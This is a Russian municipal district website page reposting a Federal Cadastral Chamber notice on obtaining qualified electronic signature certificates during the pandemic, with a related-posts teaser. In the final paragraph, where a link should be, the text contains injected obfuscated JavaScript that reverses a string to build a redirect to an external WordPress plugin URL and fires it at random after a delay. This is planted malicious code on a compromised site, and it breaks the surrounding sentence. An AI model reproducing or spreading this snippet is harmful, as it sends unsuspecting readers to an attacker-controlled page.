Администрация Веденского муниципального района

Search

Кадастровая палата рекомендует подписывать документы с помощью электронной подписи

Кадастровая палата рекомендует подписывать документы с помощью электронной подписи

Для обеспечения безопасности жизни и здоровья граждан в условиях пандемии,      в целях снижения физических контактов, Кадастровая палата рекомендует подписывать различные документы, в том числе при сделках с недвижимостью, в электронном виде с помощью электронной подписи. Получить сертификат электронной подписи можно в созданном на базе Федеральной кадастровой палаты Удостоверяющем центре. Несмотря на временное изменение некоторыми ведомствами формата работы с гражданами в период с 6 по 30 апреля, Удостоверяющий центр ФКП свою деятельность не приостанавливает и формат работы не меняет.

Чтобы получить сертификат электронной подписи, нужно зарегистрироваться на сайте Удостоверяющего центра, подать запрос в «Личном кабинете» и оплатить услугу. Далее необходимо пройти процедуру удостоверения личности в пункте оказания услуги. Это необходимая процедура, подтверждающая получение электронной подписи именно ее владельцем. Для удобства граждан, а также для минимизации их контактов с другими людьми, Кадастровая палата ввела предварительную запись на процедуру в офисах ведомства. Для уточнения возможной даты и времени приема для проведения процедуры удостоверения личности с заявителем связывается сотрудник Удостоверяющего центра. Во время прохождения процедуры сотрудниками Удостоверяющего центра соблюдаются все меры предупредительного характера, в том числе они обеспечиваются средствами индивидуальной защиты.

Между тем, в разных регионах порядок работы Удостоверяющего центра может незначительно различаться. Рекомендуем заранее уточнять информацию в офисе Удостоверяющего центра вашего региона. Контакты центра можно найти на сайте Федеральной кадастровой палаты во вкладке «Обратная связь».

Усиленная квалифицированная электронная подпись – аналог собственноручной подписи, имеющий юридическую силу и действительный на всей территории страны. С помощью сертификата электронной подписи можно в режиме онлайн и не выходя из дома зарегистрировать права собственности на объект недвижимости, получить сведения из ЕГРН, ИНН, заполнить анкету для переоформления паспорта, отследить штрафы ГИБДД, подать заявление для поступления в вуз и получить многие другие государственные услуги.

Для создания сертификата электронной подписи вам потребуется предоставить пакет документов, в который входят оригиналы документов: паспорт, СНИЛС – страховое свидетельство обязательного пенсионного страхования, ИНН – индивидуальный номер налогоплательщика. Индивидуальные предприниматели  также предоставляют основной государственный регистрационный номер записи о государственной регистрации физлица в качестве ИП, представитель юрлица–документы, которые подтверждают полномочия на действия от имени юридического лица.

Удостоверяющий центр Федеральной кадастровой палаты начал работу в июле 2016 года. За время работы выдано более 125 тысяч сертификатов квалифицированной электронной подписи. Подробнее об Удостоверяющем центре Федеральной кадастровой палаты можно узнать на $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tov-po-eksterritorialnomu-printsipu/”>специальную линию для предварительной записи на подачу документов. Так, по предварительной записи в офисах ведомства можно подать документы для учетно-регистрационных операций по экстерриториальному принципу.

 

Федеральная кадастровая палата

 

Поделится:

Похожие посты

В рамках реализации национального проекта «Малое и среднее предпринимательство и поддержка индивидуальной предпринимательской инициативы» в целях поддержки предпринимателей, осуществляющих деятельность, направленную на достижение общественно полезных целей, способствующих решению социальных проблем граждан и общества, в 2021 году создан Центр инноваций социальной сферы (далее – ЦИСС).

В рамках реализации национального проекта «Малое и среднее предпринимательство и поддержка индивидуальной предпринимательской инициативы» в целях поддержки предпринимателей, осуществляющих деятельность,

Читать далее